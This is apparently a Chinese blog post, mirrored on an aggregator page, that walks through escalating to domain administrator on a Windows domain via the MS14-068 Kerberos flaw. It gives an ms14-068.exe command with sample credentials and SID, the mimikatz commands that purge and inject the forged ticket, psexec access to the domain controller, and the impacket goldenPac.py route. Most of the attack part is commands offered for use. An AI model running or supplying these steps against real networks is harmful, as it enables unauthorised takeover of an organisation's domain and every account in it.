zoukankan
html css js c++ java
MS14-068提权和impacket工具包提权
ms14-068提权
工具利用
a)拿下边界机win7,并已经有win7上任意一个账号的密码
-u 用户名@域
-p 用户密码
-s 用户sid
-d 域控
ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据
导入票据
导入之前,清空票据缓存
kerberos::purge
kerberos::ptc 票据
使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限
impacket工具包提权
b) 没拿到边界机,但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本
注意@domain-host 指的是域控机的位置
成功进入win08的命令行模式
查看全文
相关阅读:
linux下的crontab定时执行任务命令详解
494. Target Sum
347. Top K Frequent Elements
5. Longest Palindromic Substring
时间复杂度计算方法
62. Unique Paths
54. Spiral Matrix && 59. Spiral Matrix II
57. Insert Interval
53. Maximum Subarray
42.Trapping rain water
原文地址:https://www.cnblogs.com/sup3rman/p/12329854.html
最新文章
打气球
c
cgcg
冰球
11
cross
hdu 1045
细胞
SQL------删除重复数据
2019年的工作总结
热门文章
Xamarin Android提示找不到资源属性定义
排版技巧---对后端人实用的
大学里留下的读书笔记
顺应天性
SQL——优化in
Pycharm初次使用
对资本的了解
yum源使用报错
linuk下proftpd安装
sqlldr
Copyright © 2011-2022 走看看